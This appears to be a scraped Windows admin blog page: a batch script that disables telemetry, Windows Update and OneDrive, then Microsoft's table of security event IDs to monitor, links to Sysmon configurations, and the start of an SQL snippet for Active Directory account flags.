schtasks /Change /TN "Microsoft\Windows\WindowsUpdate\Automatic App Update" /Disable

 

@rem *** Telemetry i Data Collection ***

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v PreventDeviceMetadataFromNetwork /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d 0 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "AITEnable" /t REG_DWORD /d 0 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger" /v "Start" /t REG_DWORD /d 0 /f

 

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v Enabled /t REG_DWORD /d 0 /f

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f

reg add "HKCU\Control Panel\International\User Profile" /v HttpAcceptLanguageOptOut /t REG_DWORD /d 1 /f

 

reg add "HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings" /v UxOption /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" /v DODownloadMode /t REG_DWORD /d 0 /f

 

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU " /v NoAutoUpdate /t REG_DWORD /d 1 /f

reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU"     /f /v AUOptions /t reg_dword /d 2

 

REM reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 1 /f

 

REM reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d 1 /f

reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t  REG_DWORD /d 0 /f

reg add HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU     /f /v ScheduledInstallDay /t reg_dword /d 0

 

 

REM *** usunięcie OneDrive ***

start /wait "" "%SYSTEMROOT%\SYSWOW64\ONEDRIVESETUP.EXE" /UNINSTALL

rd C:\OneDriveTemp /Q /S >NUL 2>&1

rd "%USERPROFILE%\OneDrive" /Q /S >NUL 2>&1

rd "%LOCALAPPDATA%\Microsoft\OneDrive" /Q /S >NUL 2>&1

rd "%PROGRAMDATA%\Microsoft OneDrive" /Q /S >NUL 2>&1

reg add "HKEY_CLASSES_ROOT\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder" /f /v Attributes /t REG_DWORD /d 0 >NUL 2>&1

reg add "HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder" /f /v Attributes /t REG_DWORD /d 0 >NUL 2>&1

start /wait TASKKILL /F /IM explorer.exe

start explorer.exe

 

 

security Windows

7 May 2018
https://www.sans.org/reading-room/whitepapers/microsoft/securing-windows-10-giac-enterprise-endpoint-ise-m-6100-security-project-practicum-technical-paper-36592

Events to Monitor

Windows | 10 February 2018

source: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor

Appendix L: Events to Monitor

Applies To: Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Appendix L: Events to Monitor

The following table lists events that you should monitor in your environment, according to the recommendations provided in Monitoring Active Directory for Signs of Compromise. In the following table, the "Current Windows Event ID" column lists the event ID as it is implemented in versions of Windows and Windows Server that are currently in mainstream support.

The "Legacy Windows Event ID" column lists the corresponding event ID in legacy versions of Windows such as client computers running Windows XP or earlier and servers running Windows Server 2003 or earlier. The "Potential Criticality" column identifies whether the event should be considered of low, medium, or high criticality in detecting attacks, and the "Event Summary" column provides a brief description of the event.

A potential criticality of High means that one occurrence of the event should be investigated. Potential criticality of Medium or Low means that these events should only be investigated if they occur unexpectedly or in numbers that significantly exceed the expected baseline in a measured period of time. All organizations should test these recommendations in their environments before creating alerts that require mandatory investigative responses. Every environment is different, and some of the events ranked with a potential criticality of High may occur due to other harmless events.

       
Current Windows Event ID Legacy Windows Event ID Potential Criticality Event Summary
4618 N/A High A monitored security event pattern has occurred.
4649 N/A High A replay attack was detected. May be a harmless false positive due to misconfiguration error.
4719 612 High System audit policy was changed.
4765 N/A High SID History was added to an account.
4766 N/A High An attempt to add SID History to an account failed.
4794 N/A High An attempt was made to set the Directory Services Restore Mode.
4897 801 High Role separation enabled:
4964 N/A High Special groups have been assigned to a new logon.
5124 N/A High A security setting was updated on the OCSP Responder Service
N/A 550 Medium to High Possible denial-of-service (DoS) attack
1102 517 Medium to High The audit log was cleared
4621 N/A Medium Administrator recovered system from CrashOnAuditFail. Users who are not administrators will now be allowed to log on. Some auditable activity might not have been recorded.
4675 N/A Medium SIDs were filtered.
4692 N/A Medium Backup of data protection master key was attempted.
4693 N/A Medium Recovery of data protection master key was attempted.
4706 610 Medium A new trust was created to a domain.
4713 617 Medium Kerberos policy was changed.
4714 618 Medium Encrypted data recovery policy was changed.
4715 N/A Medium The audit policy (SACL) on an object was changed.
4716 620 Medium Trusted domain information was modified.
4724 628 Medium An attempt was made to reset an account's password.
4727 631 Medium A security-enabled global group was created.
4735 639 Medium A security-enabled local group was changed.
4737 641 Medium A security-enabled global group was changed.
4739 643 Medium Domain Policy was changed.
4754 658 Medium A security-enabled universal group was created.
4755 659 Medium A security-enabled universal group was changed.
4764 667 Medium A security-disabled group was deleted
4764 668 Medium A group's type was changed.
4780 684 Medium The ACL was set on accounts which are members of administrators groups.
4816 N/A Medium RPC detected an integrity violation while decrypting an incoming message.
4865 N/A Medium A trusted forest information entry was added.
4866 N/A Medium A trusted forest information entry was removed.
4867 N/A Medium A trusted forest information entry was modified.
4868 772 Medium The certificate manager denied a pending certificate request.
4870 774 Medium Certificate Services revoked a certificate.
4882 786 Medium The security permissions for Certificate Services changed.
4885 789 Medium The audit filter for Certificate Services changed.
4890 794 Medium The certificate manager settings for Certificate Services changed.
4892 796 Medium A property of Certificate Services changed.
4896 800 Medium One or more rows have been deleted from the certificate database.
4906 N/A Medium The CrashOnAuditFail value has changed.
4907 N/A Medium Auditing settings on object were changed.
4908 N/A Medium Special Groups Logon table modified.
4912 807 Medium Per User Audit Policy was changed.
4960 N/A Medium IPsec dropped an inbound packet that failed an integrity check. If this problem persists, it could indicate a network issue or that packets are being modified in transit to this computer. Verify that the packets sent from the remote computer are the same as those received by this computer. This error might also indicate interoperability problems with other IPsec implementations.
4961 N/A Medium IPsec dropped an inbound packet that failed a replay check. If this problem persists, it could indicate a replay attack against this computer.
4962 N/A Medium IPsec dropped an inbound packet that failed a replay check. The inbound packet had too low a sequence number to ensure it was not a replay.
4963 N/A Medium IPsec dropped an inbound clear text packet that should have been secured. This is usually due to the remote computer changing its IPsec policy without informing this computer. This could also be a spoofing attack attempt.
4965 N/A Medium IPsec received a packet from a remote computer with an incorrect Security Parameter Index (SPI). This is usually caused by malfunctioning hardware that is corrupting packets. If these errors persist, verify that the packets sent from the remote computer are the same as those received by this computer. This error may also indicate interoperability problems with other IPsec implementations. In that case, if connectivity is not impeded, then these events can be ignored.
4976 N/A Medium During Main Mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation.
4977 N/A Medium During Quick Mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation.
4978 N/A Medium During Extended Mode negotiation, IPsec received an invalid negotiation packet. If this problem persists, it could indicate a network issue or an attempt to modify or replay this negotiation.
4983 N/A Medium An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.
4984 N/A Medium An IPsec Extended Mode negotiation failed. The corresponding Main Mode security association has been deleted.
5027 N/A Medium The Windows Firewall Service was unable to retrieve the security policy from the local storage. The service will continue enforcing the current policy.
5028 N/A Medium The Windows Firewall Service was unable to parse the new security policy. The service will continue with currently enforced policy.
5029 N/A Medium The Windows Firewall Service failed to initialize the driver. The service will continue to enforce the current policy.
5030 N/A Medium The Windows Firewall Service failed to start.
5035 N/A Medium The Windows Firewall Driver failed to start.
5037 N/A Medium The Windows Firewall Driver detected critical runtime error. Terminating.
5038 N/A Medium Code integrity determined that the image hash of a file is not valid. The file could be corrupt due to unauthorized modification or the invalid hash could indicate a potential disk device error.
5120 N/A Medium OCSP Responder Service Started
5121 N/A Medium OCSP Responder Service Stopped
5122 N/A Medium A configuration entry changed in OCSP Responder Service
5123 N/A Medium A configuration entry changed in OCSP Responder Service
5376 N/A Medium Credential Manager credentials were backed up.
5377 N/A Medium Credential Manager credentials were restored from a backup.
5453 N/A Medium An IPsec negotiation with a remote computer failed because the IKE and AuthIP IPsec Keying Modules (IKEEXT) service is not started.
5480 N/A Medium IPsec Services failed to get the complete list of network interfaces on the computer. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem.
5483 N/A Medium IPsec Services failed to initialize RPC server. IPsec Services could not be started.
5484 N/A Medium IPsec Services has experienced a critical failure and has been shut down. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks.
5485 N/A Medium IPsec Services failed to process some IPsec filters on a plug-and-play event for network interfaces. This poses a potential security risk because some of the network interfaces may not get the protection provided by the applied IPsec filters. Use the IP Security Monitor snap-in to diagnose the problem.
6145 N/A Medium One or more errors occurred while processing security policy in the Group Policy objects.
6273 N/A Medium Network Policy Server denied access to a user.
6274 N/A Medium Network Policy Server discarded the request for a user.
6275 N/A Medium Network Policy Server discarded the accounting request for a user.
6276 N/A Medium Network Policy Server quarantined a user.
6277 N/A Medium Network Policy Server granted access to a user but put it on probation because the host did not meet the defined health policy.
6278 N/A Medium Network Policy Server granted full access to a user because the host met the defined health policy.
6279 N/A Medium Network Policy Server locked the user account due to repeated failed authentication attempts.
6280 N/A Medium Network Policy Server unlocked the user account.
- 640 Medium General account database changed
- 619 Medium Quality of Service Policy changed
24586 N/A Medium An error was encountered converting volume
24592 N/A Medium An attempt to automatically restart conversion on volume %2 failed.
24593 N/A Medium Metadata write: Volume %2 returning errors while trying to modify metadata. If failures continue, decrypt volume
24594 N/A Medium Metadata rebuild: An attempt to write a copy of metadata on volume %2 failed and may appear as disk corruption. If failures continue, decrypt volume.
4608 512 Low Windows is starting up.
4609 513 Low Windows is shutting down.
4610 514 Low An authentication package has been loaded by the Local Security Authority.
4611 515 Low A trusted logon process has been registered with the Local Security Authority.
4612 516 Low Internal resources allocated for the queuing of audit messages have been exhausted, leading to the loss of some audits.
4614 518 Low A notification package has been loaded by the Security Account Manager.
4615 519 Low Invalid use of LPC port.
4616 520 Low The system time was changed.
4622 N/A Low A security package has been loaded by the Local Security Authority.
4624 528,540 Low An account was successfully logged on.
4625 529-537,539 Low An account failed to log on.
4634 538 Low An account was logged off.
4646 N/A Low IKE DoS-prevention mode started.
4647 551 Low User initiated logoff.
4648 552 Low A logon was attempted using explicit credentials.
4650 N/A Low An IPsec Main Mode security association was established. Extended Mode was not enabled. Certificate authentication was not used.
4651 N/A Low An IPsec Main Mode security association was established. Extended Mode was not enabled. A certificate was used for authentication.
4652 N/A Low An IPsec Main Mode negotiation failed.
4653 N/A Low An IPsec Main Mode negotiation failed.
4654 N/A Low An IPsec Quick Mode negotiation failed.
4655 N/A Low An IPsec Main Mode security association ended.
4656 560 Low A handle to an object was requested.
4657 567 Low A registry value was modified.
4658 562 Low The handle to an object was closed.
4659 N/A Low A handle to an object was requested with intent to delete.
4660 564 Low An object was deleted.
4661 565 Low A handle to an object was requested.
4662 566 Low An operation was performed on an object.
4663 567 Low An attempt was made to access an object.
4664 N/A Low An attempt was made to create a hard link.
4665 N/A Low An attempt was made to create an application client context.
4666 N/A Low An application attempted an operation:
4667 N/A Low An application client context was deleted.
4668 N/A Low An application was initialized.
4670 N/A Low Permissions on an object were changed.
4671 N/A Low An application attempted to access a blocked ordinal through the TBS.
4672 576 Low Special privileges assigned to new logon.
4673 577 Low A privileged service was called.
4674 578 Low An operation was attempted on a privileged object.
4688 592 Low A new process has been created.
4689 593 Low A process has exited.
4690 594 Low An attempt was made to duplicate a handle to an object.
4691 595 Low Indirect access to an object was requested.
4694 N/A Low Protection of auditable protected data was attempted.
4695 N/A Low Unprotection of auditable protected data was attempted.
4696 600 Low A primary token was assigned to process.
4697 601 Low Attempt to install a service
4698 602 Low A scheduled task was created.
4699 602 Low A scheduled task was deleted.
4700 602 Low A scheduled task was enabled.
4701 602 Low A scheduled task was disabled.
4702 602 Low A scheduled task was updated.
4704 608 Low A user right was assigned.
4705 609 Low A user right was removed.
4707 611 Low A trust to a domain was removed.
4709 N/A Low IPsec Services was started.
4710 N/A Low IPsec Services was disabled.
4711 N/A Low May contain any one of the following: PAStore Engine applied locally cached copy of Active Directory storage IPsec policy on the computer.PAStore Engine applied Active Directory storage IPsec policy on the computer.PAStore Engine applied local registry storage IPsec policy on the computer.PAStore Engine failed to apply locally cached copy of Active Directory storage IPsec policy on the computer.PAStore Engine failed to apply Active Directory storage IPsec policy on the computer.PAStore Engine failed to apply local registry storage IPsec policy on the computer.PAStore Engine failed to apply some rules of the active IPsec policy on the computer.PAStore Engine failed to load directory storage IPsec policy on the computer.PAStore Engine loaded directory storage IPsec policy on the computer.PAStore Engine failed to load local storage IPsec policy on the computer.PAStore Engine loaded local storage IPsec policy on the computer.PAStore Engine polled for changes to the active IPsec policy and detected no changes.
4712 N/A Low IPsec Services encountered a potentially serious failure.
4717 621 Low System security access was granted to an account.
4718 622 Low System security access was removed from an account.
4720 624 Low A user account was created.
4722 626 Low A user account was enabled.
4723 627 Low An attempt was made to change an account's password.
4725 629 Low A user account was disabled.
4726 630 Low A user account was deleted.
4728 632 Low A member was added to a security-enabled global group.
4729 633 Low A member was removed from a security-enabled global group.
4730 634 Low A security-enabled global group was deleted.
4731 635 Low A security-enabled local group was created.
4732 636 Low A member was added to a security-enabled local group.
4733 637 Low A member was removed from a security-enabled local group.
4734 638 Low A security-enabled local group was deleted.
4738 642 Low A user account was changed.
4740 644 Low A user account was locked out.
4741 645 Low A computer account was changed.
4742 646 Low A computer account was changed.
4743 647 Low A computer account was deleted.
4744 648 Low A security-disabled local group was created.
4745 649 Low A security-disabled local group was changed.
4746 650 Low A member was added to a security-disabled local group.
4747 651 Low A member was removed from a security-disabled local group.
4748 652 Low A security-disabled local group was deleted.
4749 653 Low A security-disabled global group was created.
4750 654 Low A security-disabled global group was changed.
4751 655 Low A member was added to a security-disabled global group.
4752 656 Low A member was removed from a security-disabled global group.
4753 657 Low A security-disabled global group was deleted.
4756 660 Low A member was added to a security-enabled universal group.
4757 661 Low A member was removed from a security-enabled universal group.
4758 662 Low A security-enabled universal group was deleted.
4759 663 Low A security-disabled universal group was created.
4760 664 Low A security-disabled universal group was changed.
4761 665 Low A member was added to a security-disabled universal group.
4762 666 Low A member was removed from a security-disabled universal group.
4767 671 Low A user account was unlocked.
4768 672,676 Low A Kerberos authentication ticket (TGT) was requested.
4769 673 Low A Kerberos service ticket was requested.
4770 674 Low A Kerberos service ticket was renewed.
4771 675 Low Kerberos pre-authentication failed.
4772 672 Low A Kerberos authentication ticket request failed.
4774 678 Low An account was mapped for logon.
4775 679 Low An account could not be mapped for logon.
4776 680,681 Low The domain controller attempted to validate the credentials for an account.
4777 N/A Low The domain controller failed to validate the credentials for an account.
4778 682 Low A session was reconnected to a Window Station.
4779 683 Low A session was disconnected from a Window Station.
4781 685 Low The name of an account was changed:
4782 N/A Low The password hash an account was accessed.
4783 667 Low A basic application group was created.
4784 N/A Low A basic application group was changed.
4785 689 Low A member was added to a basic application group.
4786 690 Low A member was removed from a basic application group.
4787 691 Low A nonmember was added to a basic application group.
4788 692 Low A nonmember was removed from a basic application group.
4789 693 Low A basic application group was deleted.
4790 694 Low An LDAP query group was created.
4793 N/A Low The Password Policy Checking API was called.
4800 N/A Low The workstation was locked.
4801 N/A Low The workstation was unlocked.
4802 N/A Low The screen saver was invoked.
4803 N/A Low The screen saver was dismissed.
4864 N/A Low A namespace collision was detected.
4869 773 Low Certificate Services received a resubmitted certificate request.
4871 775 Low Certificate Services received a request to publish the certificate revocation list (CRL).
4872 776 Low Certificate Services published the certificate revocation list (CRL).
4873 777 Low A certificate request extension changed.
4874 778 Low One or more certificate request attributes changed.
4875 779 Low Certificate Services received a request to shut down.
4876 780 Low Certificate Services backup started.
4877 781 Low Certificate Services backup completed.
4878 782 Low Certificate Services restore started.
4879 783 Low Certificate Services restore completed.
4880 784 Low Certificate Services started.
4881 785 Low Certificate Services stopped.
4883 787 Low Certificate Services retrieved an archived key.
4884 788 Low Certificate Services imported a certificate into its database.
4886 790 Low Certificate Services received a certificate request.
4887 791 Low Certificate Services approved a certificate request and issued a certificate.
4888 792 Low Certificate Services denied a certificate request.
4889 793 Low Certificate Services set the status of a certificate request to pending.
4891 795 Low A configuration entry changed in Certificate Services.
4893 797 Low Certificate Services archived a key.
4894 798 Low Certificate Services imported and archived a key.
4895 799 Low Certificate Services published the CA certificate to Active Directory Domain Services.
4898 802 Low Certificate Services loaded a template.
4902 N/A Low The Per-user audit policy table was created.
4904 N/A Low An attempt was made to register a security event source.
4905 N/A Low An attempt was made to unregister a security event source.
4909 N/A Low The local policy settings for the TBS were changed.
4910 N/A Low The Group Policy settings for the TBS were changed.
4928 N/A Low An Active Directory replica source naming context was established.
4929 N/A Low An Active Directory replica source naming context was removed.
4930 N/A Low An Active Directory replica source naming context was modified.
4931 N/A Low An Active Directory replica destination naming context was modified.
4932 N/A Low Synchronization of a replica of an Active Directory naming context has begun.
4933 N/A Low Synchronization of a replica of an Active Directory naming context has ended.
4934 N/A Low Attributes of an Active Directory object were replicated.
4935 N/A Low Replication failure begins.
4936 N/A Low Replication failure ends.
4937 N/A Low A lingering object was removed from a replica.
4944 N/A Low The following policy was active when the Windows Firewall started.
4945 N/A Low A rule was listed when the Windows Firewall started.
4946 N/A Low A change has been made to Windows Firewall exception list. A rule was added.
4947 N/A Low A change has been made to Windows Firewall exception list. A rule was modified.
4948 N/A Low A change has been made to Windows Firewall exception list. A rule was deleted.
4949 N/A Low Windows Firewall settings were restored to the default values.
4950 N/A Low A Windows Firewall setting has changed.
4951 N/A Low A rule has been ignored because its major version number was not recognized by Windows Firewall.
4952 N/A Low Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced.
4953 N/A Low A rule has been ignored by Windows Firewall because it could not parse the rule.
4954 N/A Low Windows Firewall Group Policy settings have changed. The new settings have been applied.
4956 N/A Low Windows Firewall has changed the active profile.
4957 N/A Low Windows Firewall did not apply the following rule:
4958 N/A Low Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer:
4979 N/A Low IPsec Main Mode and Extended Mode security associations were established.
4980 N/A Low IPsec Main Mode and Extended Mode security associations were established.
4981 N/A Low IPsec Main Mode and Extended Mode security associations were established.
4982 N/A Low IPsec Main Mode and Extended Mode security associations were established.
4985 N/A Low The state of a transaction has changed.
5024 N/A Low The Windows Firewall Service has started successfully.
5025 N/A Low The Windows Firewall Service has been stopped.
5031 N/A Low The Windows Firewall Service blocked an application from accepting incoming connections on the network.
5032 N/A Low Windows Firewall was unable to notify the user that it blocked an application from accepting incoming connections on the network.
5033 N/A Low The Windows Firewall Driver has started successfully.
5034 N/A Low The Windows Firewall Driver has been stopped.
5039 N/A Low A registry key was virtualized.
5040 N/A Low A change has been made to IPsec settings. An Authentication Set was added.
5041 N/A Low A change has been made to IPsec settings. An Authentication Set was modified.
5042 N/A Low A change has been made to IPsec settings. An Authentication Set was deleted.
5043 N/A Low A change has been made to IPsec settings. A Connection Security Rule was added.
5044 N/A Low A change has been made to IPsec settings. A Connection Security Rule was modified.
5045 N/A Low A change has been made to IPsec settings. A Connection Security Rule was deleted.
5046 N/A Low A change has been made to IPsec settings. A Crypto Set was added.
5047 N/A Low A change has been made to IPsec settings. A Crypto Set was modified.
5048 N/A Low A change has been made to IPsec settings. A Crypto Set was deleted.
5050 N/A Low An attempt to programmatically disable the Windows Firewall using a call to InetFwProfile.FirewallEnabled(False)
5051 N/A Low A file was virtualized.
5056 N/A Low A cryptographic self test was performed.
5057 N/A Low A cryptographic primitive operation failed.
5058 N/A Low Key file operation.
5059 N/A Low Key migration operation.
5060 N/A Low Verification operation failed.
5061 N/A Low Cryptographic operation.
5062 N/A Low A kernel-mode cryptographic self test was performed.
5063 N/A Low A cryptographic provider operation was attempted.
5064 N/A Low A cryptographic context operation was attempted.
5065 N/A Low A cryptographic context modification was attempted.
5066 N/A Low A cryptographic function operation was attempted.
5067 N/A Low A cryptographic function modification was attempted.
5068 N/A Low A cryptographic function provider operation was attempted.
5069 N/A Low A cryptographic function property operation was attempted.
5070 N/A Low A cryptographic function property modification was attempted.
5125 N/A Low A request was submitted to the OCSP Responder Service
5126 N/A Low Signing Certificate was automatically updated by the OCSP Responder Service
5127 N/A Low The OCSP Revocation Provider successfully updated the revocation information
5136 566 Low A directory service object was modified.
5137 566 Low A directory service object was created.
5138 N/A Low A directory service object was undeleted.
5139 N/A Low A directory service object was moved.
5140 N/A Low A network share object was accessed.
5141 N/A Low A directory service object was deleted.
5152 N/A Low The Windows Filtering Platform blocked a packet.
5153 N/A Low A more restrictive Windows Filtering Platform filter has blocked a packet.
5154 N/A Low The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.
5155 N/A Low The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections.
5156 N/A Low The Windows Filtering Platform has allowed a connection.
5157 N/A Low The Windows Filtering Platform has blocked a connection.
5158 N/A Low The Windows Filtering Platform has permitted a bind to a local port.
5159 N/A Low The Windows Filtering Platform has blocked a bind to a local port.
5378 N/A Low The requested credentials delegation was disallowed by policy.
5440 N/A Low The following callout was present when the Windows Filtering Platform Base Filtering Engine started.
5441 N/A Low The following filter was present when the Windows Filtering Platform Base Filtering Engine started.
5442 N/A Low The following provider was present when the Windows Filtering Platform Base Filtering Engine started.
5443 N/A Low The following provider context was present when the Windows Filtering Platform Base Filtering Engine started.
5444 N/A Low The following sublayer was present when the Windows Filtering Platform Base Filtering Engine started.
5446 N/A Low A Windows Filtering Platform callout has been changed.
5447 N/A Low A Windows Filtering Platform filter has been changed.
5448 N/A Low A Windows Filtering Platform provider has been changed.
5449 N/A Low A Windows Filtering Platform provider context has been changed.
5450 N/A Low A Windows Filtering Platform sublayer has been changed.
5451 N/A Low An IPsec Quick Mode security association was established.
5452 N/A Low An IPsec Quick Mode security association ended.
5456 N/A Low PAStore Engine applied Active Directory storage IPsec policy on the computer.
5457 N/A Low PAStore Engine failed to apply Active Directory storage IPsec policy on the computer.
5458 N/A Low PAStore Engine applied locally cached copy of Active Directory storage IPsec policy on the computer.
5459 N/A Low PAStore Engine failed to apply locally cached copy of Active Directory storage IPsec policy on the computer.
5460 N/A Low PAStore Engine applied local registry storage IPsec policy on the computer.
5461 N/A Low PAStore Engine failed to apply local registry storage IPsec policy on the computer.
5462 N/A Low PAStore Engine failed to apply some rules of the active IPsec policy on the computer. Use the IP Security Monitor snap-in to diagnose the problem.
5463 N/A Low PAStore Engine polled for changes to the active IPsec policy and detected no changes.
5464 N/A Low PAStore Engine polled for changes to the active IPsec policy, detected changes, and applied them to IPsec Services.
5465 N/A Low PAStore Engine received a control for forced reloading of IPsec policy and processed the control successfully.
5466 N/A Low PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory cannot be reached, and will use the cached copy of the Active Directory IPsec policy instead. Any changes made to the Active Directory IPsec policy since the last poll could not be applied.
5467 N/A Low PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, and found no changes to the policy. The cached copy of the Active Directory IPsec policy is no longer being used.
5468 N/A Low PAStore Engine polled for changes to the Active Directory IPsec policy, determined that Active Directory can be reached, found changes to the policy, and applied those changes. The cached copy of the Active Directory IPsec policy is no longer being used.
5471 N/A Low PAStore Engine loaded local storage IPsec policy on the computer.
5472 N/A Low PAStore Engine failed to load local storage IPsec policy on the computer.
5473 N/A Low PAStore Engine loaded directory storage IPsec policy on the computer.
5474 N/A Low PAStore Engine failed to load directory storage IPsec policy on the computer.
5477 N/A Low PAStore Engine failed to add quick mode filter.
5479 N/A Low IPsec Services has been shut down successfully. The shutdown of IPsec Services can put the computer at greater risk of network attack or expose the computer to potential security risks.
5632 N/A Low A request was made to authenticate to a wireless network.
5633 N/A Low A request was made to authenticate to a wired network.
5712 N/A Low A Remote Procedure Call (RPC) was attempted.
5888 N/A Low An object in the COM+ Catalog was modified.
5889 N/A Low An object was deleted from the COM+ Catalog.
5890 N/A Low An object was added to the COM+ Catalog.
6008 N/A Low The previous system shutdown was unexpected
6144 N/A Low Security policy in the Group Policy objects has been applied successfully.
6272 N/A Low Network Policy Server granted access to a user.
N/A 561 Low A handle to an object was requested.
N/A 563 Low Object open for delete
N/A 625 Low User Account Type Changed
N/A 613 Low IPsec policy agent started
N/A 614 Low IPsec policy agent disabled
N/A 615 Low IPsec policy agent
N/A 616 Low IPsec policy agent encountered a potential serious failure
24577 N/A Low Encryption of volume started
24578 N/A Low Encryption of volume stopped
24579 N/A Low Encryption of volume completed
24580 N/A Low Decryption of volume started
24581 N/A Low Decryption of volume stopped
24582 N/A Low Decryption of volume completed
24583 N/A Low Conversion worker thread for volume started
24584 N/A Low Conversion worker thread for volume temporarily stopped
24588 N/A Low The conversion operation on volume %2 encountered a bad sector error. Please validate the data on this volume
24595 N/A Low Volume %2 contains bad clusters. These clusters will be skipped during conversion.
24621 N/A Low Initial state check: Rolling volume conversion transaction on %2.
5049 N/A Low An IPsec Security Association was deleted.
5478 N/A Low IPsec Services has started successfully.

Note

Refer to Microsoft Support article 947226 for lists of many security event IDs and their meanings.

Run wevtutil gp Microsoft-Windows-Security-Auditing /ge /gm:true to get a very detailed listing of all security event IDs

For more information about Windows security event IDs and their meanings, see the Microsoft Support articles Description of security events in Windows Vista and in Windows Server 2008 and Description of security events in Windows 7 and in Windows Server 2008 R2. You can also download Security Audit Events for Windows 7 and Windows Server 2008 R2 and Windows 8 and Windows Server 2012 Security Event Details, which provide detailed event information for the referenced operating systems in spreadsheet format.

Sysmon - DFIR

source https://github.com/MHaggis/sysmon-dfir | 10 February 2018

Sysmon - DFIR

A curated list of resources for learning about deploying, managing and hunting with Microsoft Sysmon. Contains presentations, deployment methods, configuration file examples, blogs and additional github repositories.

Sysmon Learning Resources

General

Sysmon Configuration

@SwiftOnSecurity config

Recommended.

Config will assist with bringing you up to speed in relation to critical process monitoring, network utilization, and so on. Note that the concept is to not log everything, but the most important items.

https://github.com/SwiftOnSecurity/sysmon-config

Sysmon_config.xml

Solid, detailed config. Probably one of the best ones out there in relation to completeness.

MalwareArchaeology

Sysmon-a.cfg

Basic config that will monitor critical Windows process execution. Very basic, but a good config to get used to sysmon and how things operate.

Blog post by blacklanternsecurity

Sysmon-b.cfg

Crypsis Group published config and PDF. Fairly detailed list of excludes that should assist with understanding how they work and get a configuration started.

Crypsis Group Config

Crypsis Group PDF

Sysmon-c.cfg

Great configuration to understand excludes and contains.

Decent Security Config

Sysmon-d.cfg

Solid blog post related to getting started with Sysmon. Config is nicely laid out and easy to understand.

909Research Blog

Sysmon-e.cfg

Config is specific but it provides a good foundation for capturing a lot of specific data.

https://github.com/Prevenity/sysmon

(Translated comments to english)

StartLogging.xml

Provided by https://github.com/VVard0g - Roberto Rodriguez

https://gist.github.com/VVard0g/136481552d8845e52962534d1a4b8664

Sysmoncfg_v2|31.xml

Related material from Splunking the Endpoint .conf talk by James Brodsky and Dimitri McKay.

Splunking the Endpoint - Files from presentation

Configs are optimized for Splunk.

Additional configs

Configs are updated frequently --

SwiftOnSecurity Fork by Ion-Storm

Server Config: https://gist.github.com/Neo23x0/a4b4af9481e01e749409

Client config: https://gist.github.com/Neo23x0/f56bea38d95040b70cf5

MSSQL LDAP ADSI provider

13 December 2017
CREATE TABLE #UserAccountControl
    (
      UserAccountControlValue INT
    , UserAccountControlDescription VARCHAR(1000)
    )

INSERT  #UserAccountControl
        ( UserAccountControlValue, UserAccountControlDescription )
VALUES  ( '512', 'Enabled Account' ),
        ( '514', 'Disabled Account' ),
        ( '544', 'Enabled, Password Not REQUIRED' ),
        ( '546', 'Disabled, Password Not REQUIRED' ),
        ( '66048', 'Enabled, Password Doesn''t Expire' ),
        ( '66050', 'Disabled, Password Doesn''t Expire' ),
        ( '66080', 'Enabled, Password Doesn''t Expire & Not Required' ),
        ( '66082', 'Disabled, Password Doesn''t Expire & Not Required' ),
        ( '262656', 'Enabled, Smartcard REQUIRED' ),
        ( '262658', 'Disabled, Smartcard Required' ),
        ( '262688', 'Enabled, Smartcard Required, Password Not REQUIRED' ),
        ( '262690', 'Disabled, Smartcard Required, Password Not Required' ),
